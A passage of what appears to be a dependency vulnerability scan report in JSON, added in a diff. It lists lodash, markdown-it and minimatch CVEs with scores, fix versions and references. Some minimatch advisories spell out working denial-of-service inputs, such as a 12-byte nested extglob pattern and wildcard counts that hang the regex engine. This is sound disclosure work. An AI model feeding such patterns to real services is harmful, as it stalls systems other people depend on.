"PkgIdentifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "186d85640a76e982" + }, + "InstalledVersion": "4.17.21", + "FixedVersion": "4.18.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6c9904d5393f374ffc11303087653ff1ba1a4ab38beb6de263c68ff75ebcff4d", + "Title": "lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass", + "Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2950", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh", + "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2950", + "https://www.cve.org/CVERecord?id=CVE-2026-2950" + ], + "PublishedDate": "2026-03-31T20:16:26.207Z", + "LastModifiedDate": "2026-04-07T16:12:25.97Z" + }, + { + "VulnerabilityID": "CVE-2022-21670", + "VendorIDs": [ + "GHSA-6vfc-qv3f-vr6c" + ], + "PkgID": "markdown-it@10.0.0", + "PkgName": "markdown-it", + "PkgIdentifier": { + "PURL": "pkg:npm/markdown-it@10.0.0", + "UID": "4c261f3cdcfba96d" + }, + "InstalledVersion": "10.0.0", + "FixedVersion": "12.3.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-21670", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:85671227dbd9d0e9036c7909ed5342e6f34c6212e2b58c6fe8aafe344a4de540", + "Title": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patt ...", + "Description": "markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-400", + "CWE-1333" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V2Score": 5, + "V3Score": 5.3 + } + }, + "References": [ + "https://github.com/markdown-it/markdown-it", + "https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101", + "https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c", + "https://nvd.nist.gov/vuln/detail/CVE-2022-21670" + ], + "PublishedDate": "2022-01-10T21:15:07.967Z", + "LastModifiedDate": "2024-11-21T06:45:11.87Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@10.0.3", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "85f0f94cea6a1bce" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:44e70ce9a7fecb769ca3aaf8433029cf985038a09a5fb6545efbcea735a70298", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@10.0.3", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "85f0f94cea6a1bce" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:97bc9e33a70f74e80bf237f22da7558149639f3813e910b88abe040b4bd49b9a", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@10.0.3", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@10.0.3", + "UID": "85f0f94cea6a1bce" + }, + "InstalledVersion": "10.0.3", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6164b782fb639f600cef85bc67da3b470d16a8e405c5e07af70b9188d46a0419", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@3.1.2", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "2583e427b34671fe" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b44ab3a326153edeb646f41cead290b9f6bf773b40ff9094339ec97fb3135d69", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@3.1.2", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "2583e427b34671fe" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:83bcac7a8c219494108df527b08b60f4afef3ee09b8daf3ef8356d68a37738a8", + "Title": "minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-407" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27903", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27903", + "https://www.cve.org/CVERecord?id=CVE-2026-27903" + ], + "PublishedDate": "2026-02-26T02:16:21.353Z", + "LastModifiedDate": "2026-02-27T17:21:22.37Z" + }, + { + "VulnerabilityID": "CVE-2026-27904", + "VendorIDs": [ + "GHSA-23c5-xmqv-rm74" + ], + "PkgID": "minimatch@3.1.2", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@3.1.2", + "UID": "2583e427b34671fe" + }, + "InstalledVersion": "3.1.2", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27904", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e3bbca27edb3b4562d57f8d1acc4b58f877a86360924b9939dacdbbf9ace3abe", + "Title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-27904", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74", + "https://linux.oracle.com/cve/CVE-2026-27904.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27904", + "https://www.cve.org/CVERecord?id=CVE-2026-27904" + ], + "PublishedDate": "2026-02-26T02:16:21.76Z", + "LastModifiedDate": "2026-02-27T17:16:23.773Z" + }, + { + "VulnerabilityID": "CVE-2026-26996", + "VendorIDs": [ + "GHSA-3ppc-4f35-3m26" + ], + "PkgID": "minimatch@9.0.5", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "7218c46a058dde84" + }, + "InstalledVersion": "9.0.5", + "FixedVersion": "10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26996", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:34372e090212d6741432f4b4c898aed34989064222509834e8eb5b6ecd0731b6", + "Title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", + "Description": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "nvd": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7896", + "https://access.redhat.com/security/cve/CVE-2026-26996", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2442922", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2442922", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904", + "https://errata.almalinux.org/9/ALSA-2026-7896.html", + "https://errata.rockylinux.org/RLSA-2026:7896", + "https://github.com/isaacs/minimatch", + "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", + "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", + "https://linux.oracle.com/cve/CVE-2026-26996.html", + "https://linux.oracle.com/errata/ELSA-2026-8339.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", + "https://www.cve.org/CVERecord?id=CVE-2026-26996" + ], + "PublishedDate": "2026-02-20T03:16:01.62Z", + "LastModifiedDate": "2026-03-06T21:32:10.65Z" + }, + { + "VulnerabilityID": "CVE-2026-27903", + "VendorIDs": [ + "GHSA-7r86-cg39-jmmj" + ], + "PkgID": "minimatch@9.0.5", + "PkgName": "minimatch", + "PkgIdentifier": { + "PURL": "pkg:npm/minimatch@9.0.5", + "UID": "7218c46a058dde84" + }, + "InstalledVersion": "9.0.5", + "FixedVersion": "10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27903", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": 